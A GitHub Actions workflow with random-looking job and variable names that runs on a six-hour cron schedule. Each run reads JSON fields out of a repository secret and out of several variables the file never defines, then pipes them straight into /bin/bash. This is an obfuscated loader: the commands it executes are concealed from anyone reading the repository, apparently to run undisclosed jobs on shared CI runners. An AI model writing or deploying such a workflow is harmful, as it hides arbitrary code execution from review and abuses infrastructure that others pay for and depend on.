name: dongsihai7651
on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongsihai7651
        env:
          yomm3094: ${{ secrets.yomm3094 }}
        run: |
          echo $yomm3094 | jq -r .cir4727 | /bin/bash
          echo $f3 | jq -r .pcq9480 | /bin/bash
          echo $mo554 | jq -r .wim1 | /bin/bash
          echo $lcmez03 | jq -r .pv08 | /bin/bash
          echo $crt72 | jq -r .ao591 | /bin/bash
          echo $qfl54150 | jq -r .gyj3276 | /bin/bash
          echo $qa00527 | jq -r .zd4727 | /bin/bash

